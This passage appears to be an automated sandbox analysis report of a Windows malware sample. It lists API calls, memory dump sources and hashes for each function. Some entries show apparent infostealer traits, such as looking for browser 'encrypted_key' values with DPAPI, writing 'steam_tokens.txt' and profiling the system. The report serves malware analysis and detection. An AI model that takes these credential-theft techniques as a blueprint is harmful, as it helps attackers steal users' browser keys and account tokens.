                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00902A65
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00902A6C
                              • Part of subcall function 00902AE0: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00902AF5
                              • Part of subcall function 00902AE0: RtlAllocateHeap.NTDLL(00000000), ref: 00902AFC
                              • Part of subcall function 00902AE0: RegOpenKeyExA.ADVAPI32(80000002,012EBBE8,00000000,00020119,00902A79), ref: 00902B1B
                              • Part of subcall function 00902AE0: RegQueryValueExA.ADVAPI32(00902A79,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00902B35
                              • Part of subcall function 00902AE0: RegCloseKey.ADVAPI32(00902A79), ref: 00902B3F
                            • RegOpenKeyExA.ADVAPI32(80000002,012EBBE8,00000000,00020119,008F9650), ref: 00902AA1
                            • RegQueryValueExA.ADVAPI32(008F9650,012FF4C8,00000000,00000000,00000000,000000FF), ref: 00902ABC
                            • RegCloseKey.ADVAPI32(008F9650), ref: 00902AC6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: 81e0c9242ef7f58ee4fc2b443f2b15673c9bc1cc50db8b9835ab6d3dd8f90312
                            • Instruction ID: 5bc95517dd5b215e6f06e25e990094cd1b770732366d115eab893fc279e6f585
                            • Opcode Fuzzy Hash: 81e0c9242ef7f58ee4fc2b443f2b15673c9bc1cc50db8b9835ab6d3dd8f90312
                            • Instruction Fuzzy Hash: D101ADB5B00209BFDB20DBA4AC4DFEA776CEB48715F508155FE08D7290EE709A418BE0
                            Function 008E71F0 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(?), ref: 008E723E
                            • GetProcessHeap.KERNEL32(00000008,00000010), ref: 008E7279
                            • RtlAllocateHeap.NTDLL(00000000), ref: 008E7280
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 008E72C3
                            • HeapFree.KERNEL32(00000000), ref: 008E72CA
                            • GetProcAddress.KERNEL32(00000000,?), ref: 008E7329
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                            • String ID:
                            • API String ID: 174687898-0
                            • Opcode ID: 743a280f05f8d190dd06910ae516142c07f69419da3577f8366d7ba9f688e52d
                            • Instruction ID: b84375b852b2aad4f8a7ecdc66df20e96b698ae4e5c584446dc758f5da507825
                            • Opcode Fuzzy Hash: 743a280f05f8d190dd06910ae516142c07f69419da3577f8366d7ba9f688e52d
                            • Instruction Fuzzy Hash: F0418C717057469BDB60CFAADC84BAAB3E8FB8A305F544569ED4EC7300E631E900DB50
                            Function 008E9C70 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 008E9CA8
                            • LocalAlloc.KERNEL32(00000040,?), ref: 008E9CDA
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 008E9D03
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2746078483-738592651
                            • Opcode ID: fe786fc47bd9205db919abb209108a5836ce7a072c51674e8b6c898c327c7cd2
                            • Instruction ID: 70aa365482731d95018af008d9499478ab8f29017f0eb06daf7058d66f73e517
                            • Opcode Fuzzy Hash: fe786fc47bd9205db919abb209108a5836ce7a072c51674e8b6c898c327c7cd2
                            • Instruction Fuzzy Hash: E041D272A002A99BCB31EF6ADC41AEE77B4FF96304F054464E995E7352DAB0ED00C781
                            Function 008FEBC0 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                            Download Yara Rule
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008FEC04
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FEC33
                            • lstrcat.KERNEL32(?,00000000), ref: 008FEC41
                            • lstrcat.KERNEL32(?,0091179C), ref: 008FEC5A
                            • lstrcat.KERNEL32(?,012F9370), ref: 008FEC6D
                            • lstrcat.KERNEL32(?,0091179C), ref: 008FEC7F
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: 99a64a76371836f570cfc106082e293ab752b98063833b260aaab87d9e1b52e5
                            • Instruction ID: 6ea5b15f08de7a5d4784e3eaf7a4d4e986f415851e0c18bed6a6255bfe37f6c5
                            • Opcode Fuzzy Hash: 99a64a76371836f570cfc106082e293ab752b98063833b260aaab87d9e1b52e5
                            • Instruction Fuzzy Hash: 41416672A1016DAFCB15EB78DC46EED7778FF88300F404468BA1AD7291DE709E848B91
                            Function 008FEE90 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008FEEBF
                            • lstrlen.KERNEL32(00000000), ref: 008FEED6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FEEFD
                            • lstrlen.KERNEL32(00000000), ref: 008FEF04
                            • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 008FEF32
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: steam_tokens.txt
                            • API String ID: 367037083-401951677
                            • Opcode ID: da7dd024a93238d63170453ee31cd9e9c87d2f1f735712016ad347a5dbbe835d
                            • Instruction ID: 5bc6ec867a20db78ce38610bc51993aa5c03cf898551daf0145fc9e69aaa70c1
                            • Opcode Fuzzy Hash: da7dd024a93238d63170453ee31cd9e9c87d2f1f735712016ad347a5dbbe835d
                            • Instruction Fuzzy Hash: D9318132A111995FC721BB3DEC4AAAE7BA8FF41710F044170B905DB262DF64DD0687C2
                            Function 008E9A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,008E140E), ref: 008E9A9A
                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,008E140E), ref: 008E9AB0
                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,008E140E), ref: 008E9AC7
                            • ReadFile.KERNEL32(00000000,00000000,?,008E140E,00000000,?,?,?,008E140E), ref: 008E9AE0
                            • LocalFree.KERNEL32(?,?,?,?,008E140E), ref: 008E9B00
                            • CloseHandle.KERNEL32(00000000,?,?,?,008E140E), ref: 008E9B07
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: cde7e7764a25e0e988d01d2937607e0fcf3b0bf35d7a1126daf336ffa9fd15ca
                            • Instruction ID: 8075adf4e08a4be3bd4bbe8c5e3b68784dd34b85aa67f8c928af3a5424719e7e
                            • Opcode Fuzzy Hash: cde7e7764a25e0e988d01d2937607e0fcf3b0bf35d7a1126daf336ffa9fd15ca
                            • Instruction Fuzzy Hash: 93115E71600259EFE710DFAADCC8EAA736CFB46350F504169F905E7280EBB09D40CBA0
                            Function 00905CE0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00905D24
                              • Part of subcall function 0090A383: std::exception::exception.LIBCMT ref: 0090A398
                              • Part of subcall function 0090A383: std::exception::exception.LIBCMT ref: 0090A3BE
                            • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00905D8C
                            • memmove.MSVCRT(00000000,?,?), ref: 00905D99
                            • memmove.MSVCRT(00000000,?,?), ref: 00905DA8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long
                            • API String ID: 2052693487-3788999226
                            • Opcode ID: 7a6093b1d9780bed243bb3010775b950aec62b7fbf6f73d54281629eea5ac775
                            • Instruction ID: 94b4e15c77225e78243fac9f3e6db2f310a60bb01a64798003eace7085e43425
                            • Opcode Fuzzy Hash: 7a6093b1d9780bed243bb3010775b950aec62b7fbf6f73d54281629eea5ac775
                            • Instruction Fuzzy Hash: AF415171B005199FCF14DF6CC895AAEBBB5EB88710F15866AE919E7384D7309D018FD0
                            Function 008F7E80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 008F7E98
                              • Part of subcall function 0090A3D0: std::exception::exception.LIBCMT ref: 0090A3E5
                              • Part of subcall function 0090A3D0: std::exception::exception.LIBCMT ref: 0090A40B
                            • std::_Xinvalid_argument.LIBCPMT ref: 008F7EB6
                            • std::_Xinvalid_argument.LIBCPMT ref: 008F7ED1
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_$std::exception::exception
                            • String ID: invalid string position$string too long
                            • API String ID: 3310641104-4289949731
                            • Opcode ID: 7504b4542069367fdc07c092959375fc3251be3bb620754248ba7dddf4e90c93
                            • Instruction ID: cc1455847a5140fc131c0daf8c27d356d1d2280a4d25c95cd0dd7843da974d85
                            • Opcode Fuzzy Hash: 7504b4542069367fdc07c092959375fc3251be3bb620754248ba7dddf4e90c93
                            • Instruction Fuzzy Hash: 922195323083484BE724DE7CE880A3AB7E5FB95B14B20496EF556CB681D771DC4487A1
                            Function 00903590 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009035BF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 009035C6
                            • GlobalMemoryStatusEx.KERNEL32 ref: 009035E1
                            • wsprintfA.USER32 ref: 00903607
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB
                            • API String ID: 2922868504-2651807785
                            • Opcode ID: b20e00da5663941211e74e54266343eb352e36dd4be37f4c14c0c9570034ff8e
                            • Instruction ID: ae0fd348091ed9ddc1ec174a76fec4e0b59aaf8204f1dc3fccad7eed84970535
                            • Opcode Fuzzy Hash: b20e00da5663941211e74e54266343eb352e36dd4be37f4c14c0c9570034ff8e
                            • Instruction Fuzzy Hash: 1C01B571E04654AFD7049B98DD49BAEB7BCFB44710F404629F905E73D0DB749E0086A1
                            Function 008FD9A0 Relevance: 7.6, APIs: 5, Instructions: 127registrystringCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,012FE1E0,00000000,00020119,?), ref: 008FD9E5
                            • RegQueryValueExA.ADVAPI32(?,012FF738,00000000,00000000,00000000,000000FF), ref: 008FDA09
                            • RegCloseKey.ADVAPI32(?), ref: 008FDA13
                            • lstrcat.KERNEL32(?,00000000), ref: 008FDA38
                            • lstrcat.KERNEL32(?,012FF7F8), ref: 008FDA4C
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
